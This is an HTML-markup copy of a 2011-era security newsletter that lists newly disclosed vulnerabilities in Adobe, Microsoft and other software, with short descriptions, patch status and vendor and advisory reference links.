class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Cross Platform&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 16 (#1)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Web Application - SQL Injection&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Web Application&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Network Device&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;***************************************************************************&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;b&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Part I&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt; -- Critical Vulnerabilities from TippingPoint (&lt;/span&gt;&lt;a href="http://www.tippingpoint.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;www.tippingpoint.com&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;) Widely Deployed Software&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;(1) HIGH: Adobe Products Multiple Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;(2) HIGH: Microsoft Patch Tuesday Multiple Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;***************************************************************************&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;b&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Part II&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt; -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;(&lt;/span&gt;&lt;a href="http://www.qualys.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;www.qualys.com&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;-- Other Microsoft Products&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.1&amp;nbsp; - Microsoft Lync Server 2010 "ReachJoin.aspx" Remote Command Injection&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;-- Third Party Windows Apps&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.2&amp;nbsp; - Trend Micro Data Loss Prevention Directory Traversal&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;-- Linux&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.3&amp;nbsp; - GNOME NetworkManager "/var/log/messages" Information Disclosure&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.4&amp;nbsp; - OProfile Multiple Security Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;-- Aix&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.5&amp;nbsp; - IBM AIX Luns Ownership Security Bypass Issue&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;-- Unix&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.6&amp;nbsp; - HP Operations for UNIX Unspecified Cross-Site Scripting and Unauthorized Access Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.7&amp;nbsp; - D-Bus Message Byte Order Denial of Service&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;-- Cross Platform&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.8&amp;nbsp; - Fabric Insecure Temporary File Creation Vulnerability&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.9&amp;nbsp; - KMPlayer ".mp3" File Remote Buffer Overflow&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.10 - Wireshark Multiple Denial of Service Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.11 - Ruby on Rails Multiple Cross-Site Scripting Filter Security Bypass Weaknesses&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.12 - HP Service Manager and Service Center Multiple Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.13 - VLC Media Player XSPF Playlist Integer Overflow Memory Corruption&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.14 - HP OpenView Storage Data Protector Unspecified Remote Code Execution&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.15 - libmodplug "S3M" Stack Based Buffer Overflow&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.16 - Jabberd XML Parsing Denial of Service&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.17 - PHP Security Bypass Issue&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.18 - Opera Web Browser Denial of Service&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.19 - Adobe Acrobat and Reader Multiple Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.20 - Adobe LiveCycle Data Services and BlazeDS Multiple Remote Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.21 - Adobe ColdFusion Unspecified Cross-Site Request Forgery and Remote Denial of Service&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.22 - Adobe Shockwave Player Multiple Remote Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.23 - Adobe Flash Player Remote Memory Corruption&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;-- Web Application - SQL Injection&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.24 - WebFileExplorer "user" and "pass" SQL Injection Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;-- Web Application&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.25 - Drupal Spam Module Cross-Site Request Forgery&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.26 - Horde Authentication Framework Composite Driver Authentication Bypass&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.27 - HTML Purifier Cross-Site Scripting and Denial of Service Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;-- Network Device&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.28 - Veri-NAC URI Handling Directory Traversal Vulnerability&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;11.25.29 - Barracuda NG Firewall and phion netfence Remote Code Execution&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;*************************************************************&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;PART I Critical Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Part I for this issue has been compiled by Josh Bronson at TippingPoint, a division of HP, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at &lt;/span&gt;&lt;a href="http://www.sans.org/newsletters/risk/#process"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.sans.org/newsletters/risk/#process&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;*************************************************************&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;(1) HIGH: Adobe Products Multiple Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Affected:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;ColdFusion 9.0.1 and earlier&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Adobe Flash Player 10.3.181.23 and earlier Adobe Shockwave Player 11.5.9.620 and earlier Adobe Reader X (10.0.1) and earlier Adobe Acrobat X (10.0.3) and earlier&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Description: Adobe has released patches for multiple security vulnerabilities affecting multiple products. Adobe has reported that the unspecified memory corruption vulnerability in Adobe Flash is being actively exploited in the wild. That issue was initially reported as an 0-day vulnerability. The Shockwave Player vulnerabilities involve various errors in the handling of malformed Adobe director files. The Reader vulnerabilities involve the vulnerable code blindly trusting malicious attacker-provided lengths in malicious files. By enticing a target to open a malicious file, an attacker can exploit these vulnerabilities in order to execute arbitrary code on the target's machine. Code will execute with the permissions of the user running the browser or Reader application.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Status: vendor confirmed, updates available&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;References:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;Vendor Site&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.adobe.com/"&gt;http://www.adobe.com&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Adobe Security Updates&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.adobe.com/support/security/bulletins/apsb11-14.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.adobe.com/support/security/bulletins/apsb11-14.html&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.adobe.com/support/security/bulletins/apsb11-16.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.adobe.com/support/security/bulletins/apsb11-16.html&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.adobe.com/support/security/bulletins/apsb11-17.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.adobe.com/support/security/bulletins/apsb11-17.html&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.adobe.com/support/security/bulletins/apsb11-18.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.adobe.com/support/security/bulletins/apsb11-18.html&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Zero Day Initiative Advisories&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-200"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-200&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-201"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-201&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-202"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-202&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-203"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-203&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-204"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-204&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-205"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-205&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-206"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-206&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-207"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-207&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-208"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-208&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-209"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-209&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-210"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-210&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-211"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-211&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-212"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-212&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-213"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-213&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-214"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-214&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-215"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-215&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-216"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-216&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-217"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-217&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-US" 